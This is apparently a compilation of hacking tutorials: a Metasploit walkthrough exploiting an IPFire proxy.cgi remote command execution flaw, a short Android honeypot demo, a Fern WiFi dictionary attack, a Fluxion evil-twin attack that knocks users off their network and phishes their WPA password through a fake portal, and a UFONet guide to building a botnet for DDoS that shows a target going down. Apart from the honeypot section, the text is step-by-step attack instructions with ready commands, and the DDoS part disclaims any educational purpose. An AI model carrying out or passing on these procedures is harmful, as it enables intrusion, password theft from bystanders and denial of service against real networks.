Exploitation in Linux Firewall using IPFire proxy.cgi RCE

IPFire, a free linux based open source firewall distribution, version < 2.19 Update Core 101 contains remote command execution vulnerability in the proxy.cgi page.

Exploit Targets

Ipfire 2.19

Requirement

Attacker: kali Linux

Victim PC: linux

Open Kali terminal type msfconsole

Now type use exploit/linux/http/ipfire_proxy_exec

msf exploit (ipfire_proxy_exec)>set rhost 192.168.0.169 (IP of Remote Host)

msf exploit (ipfire_proxy_exec)>set rport 444

msf exploit (ipfire_proxy_exec)>set password admin

msf exploit (ipfire_proxy_exec)>exploit

Detect Hacker in Network using Android Phone

HosTaGe is a mobile honeypot that detects attacks on wireless networks.

First of all search for HosTaGe honeypot on android play store.

Now click on the above shown app and install it.

Now for testing i will start nmap version scan of the android from my system with command :

Nmap –sV 192.168.0.107

Here 192.168.0.107 is my target ip.

As  you can see various fake services are started as shown in nmap results.

As the nmap  scanning is started the android icon will turn red and an alarm will be started.

Cracking Wifi Password using Fern WIFi Cracker

Fern is a python based Wi-Fi cracker tool used for security auditing purposes. The program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks. The tool is available both as open source and a premium model of the free version. In this article we’ll be demonstrating a WPA dictionary attack using the open source version. You can check the link to download it here.

First step is to launch the tool. If you have installed all of the requirements mentioned, you’ll be able to see the following screen.

 

Now, here in the first option, the user can select the wireless interface from the drop down menu. Here, we have selected the Wlan0 interface. As you can see that fern here has automatically put the Wlan0 interface on monitor mode.

 

Monitor Mode: NIC cards by default are designed to only capture packets that are destined to be reached to a specific device. Monitor mode is essentially a promiscuous mode for wireless networks that allows Wi-Fi adapters to capture Wi-Fi management, data and control packets without having to associate with that access point first. Hence, by definition we can understand that raw pcap files can be captured by a wireless adapter in monitor mode and can be used for auditing and/or hacking purposes.

 

Once we have chosen the interface, we’ll need to scan for access points now.

 

Here, observe that we have scanned a total of 18 access points.

 

 

Access Point: It is a device that sends out wireless signals. Essentially the internet connection from a router runs down to an access point and allows users to access the internet using IEEE 802.11 protocol (commonly known as Wi-Fi). In our day to day usage scenario, we have a Wi-Fi router set up at home which also serves as a wireless access point.

 

SSID: Service Set IDentifier is the name given to an access point for simplicity.

 

Launching the attack: Now we can click on the discovered access point, choose a dictionary file and click on launch attack with our chosen dictionary. It is that simple! As you can see that we have a matched credential and received the SSID password down below.

 

Please note that this program is only able to crack WPA/WEP/WPS keys only. For tools that work on stronger encryption like WPA2 please refer to the latest article on wireless penetration testing on Hacking Articles. Thanks for reading.

Hack Wi-Fi using Social Engineering with Fluxion (Evil Twin Attack)

FLUXION is a remake of Linset by vk439 with less bugs and more features. It’s accordant with the latest release of Kali. This new Wi-Fi hacking method could potentially allow hackers or attackers to recover the password key. In this method, attacker develop a new wi-fi with the same name which is already existing. For this purpose, Fluxion is required to create evil-twin of the target wireless network (wi-fi). Let’s see how it works.

How it works

• Scan the networks.
• Capture a handshake (can’t be used without a valid handshake, it’s necessary to verify the password)
• Use WEB Interface *
• Launch a Fake AP instance to imitate the original access point
• Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the Fake AP and enter the WPA password.
• A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
• A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
• Each submitted password is verified by the handshake captured earlier
• The attack will automatically terminate, as soon as a correct password is submitted.

First of all clone Fluxion from github with command:

git clone https://github.com/wi-fi-analyzer/fluxion.git

Now, as you have downloaded Fluxion; now download all the tools which are required to run Fluxion as it is done in the image below.

cd fluxion

ls

cd install/

ls

./install.sh

And execute the script from its folder with command:

./fluxion

You will see the screen which is shown below. Select your preferred language as we have chosen English by pressing 1 and press Enter.

Now, select all channels which is option 1. It will ask you to select the channel to listen to wi-fi connections so enter 1 to listen to all wi-fi connections.

Now a new window will appear on your screen which is monitoring all the wi-fi channels.AS you see your target wi-fi. Simply hit ctrl+c to stop the search.

Now it will show you a list of available targets. Select yours by pressing the id no. of that connection as in my case I have chosen PEN LAB by pressing 4. Now here you will notice a change in all the target available. On id no. 3 and 4 there is an Asterisk (*) before the mac address which represents that an increased number of clients are attached to this wi-fi connection. For this purpose, we have chosen id no.4

The more clients mean the more no. of people are there who can enter the wi-fi password erroneously.

Now select option 1 for establishing Fake AP (access point) and press enter. It will generate a Fake wi-fi AP.

Now choose ENTER to skip and then select 1 for choosing Pyrit from handshake checking options.

Now you can simply press ENTER to save the .cap file at default location i.e. /root/Desktop/fluxion.cap all may provide the path to save the .cap file at destination location.

Now select option 1 to De authenticate all clients which are attached to the target wi-fi.  Here Deauth all is representing that it is sending a small DOS attack and all the clients who are connected to the wi-fi will be disconnected automatically.

Now select 1 for CAPTURE HANDSHAKE; you will see 2 windows, one for capturing WPA handshake and other for DE authenticate all clients. Now enter 1 on the MENU window to check handshake without closing the other ones.

Now, enter 1 for selection of Create a SSL certificate.

Again choose 1 for WEB INTERFACE.

Now it will ask you to choose the language, so select 1 for English and enter.

Now it will show you the 4 different windows starting the fake AP and DE authenticating the clients of the wi-fi network. For instance; now the clients will see 2 wi-fi AP under the same name.

When victim will connect to fake AP it will ask to enter the Password to reconnect with network.

The moment one will enter the password; you will see a screen with the password entered by the victim.

Now; as shown in the image above we have got our key or password “ignite@123” through FLUXION which is the best and trouble-free straightforward method of cracking the wi-fi password.

How to Create Botnet for D-Dos Attack with UFONet

Remember: this tool is NOT for educational purpose.

  Usage of UFONet for attacking targets without prior mutual consent is illegal.

  It is the end user's responsibility to obey all applicable local, state and federal laws

UFONet - is a free software tool designed to test DDoS attacks against a target using 'Open Redirect' vectors on third party web applications like botnet

Features

·         Auto-update

·         Clean code (only needs python-pycurl)

·         Documentation with examples

·         Web/GUI Interface

·         Proxy to connect to 'zombies' (ex: tor)

·         Change HTTP Headers (User-Agent, Referer, Host...)

·         Configure requests (Timeout, Retries, Delay...)

·         Search for 'zombies' on google results (using a pattern or a list of dorks)

·         Test 'Open Redirect' vulnerabilities on 'zombies'

·         Download/Upload 'zombies' from Community

·         Inspect a target (HTML objects sizes)

·         Set a place to 'bit' on a target (ex: big file)

·         Control number of rounds to attack

·         Apply cache evasion techniques

·         Supports GET/POST

·         Multithreading

·         Different search engines for dorking

·         Web interface

·         Geomapping / Visual data

·         Order 'zombies' to attack you for benchmarking

First of all download UFONet from sourceforge by  this link:

https://sourceforge.net/projects/ufonet/

and extract it and enter the folder and open up the terminal and now list all the options available with this command :

./ufonet  --help

Now we have to download all the zombies that will be used for attack.Open the terminal and type:

./ufonet  --download-zombies

Now type the following command for using the GUI version:

./ufonet  --gui

The above command will open a browser with GUI options .Click on START MOTHERSHIP.

Now it will open up a GUI with different options.

Now click on Botnet option.

Clicking on Botnet will give many options to configure.

Now clicking on List Zombies will list all the Zombies it will be using for the attack.

Now click on Attack option.

Set the target to your target URL or your target IP and set the number of rounds as per your need and click on start for the attack.

As you can see first round of attack is started from multiple zombies and after a time the host  will be down.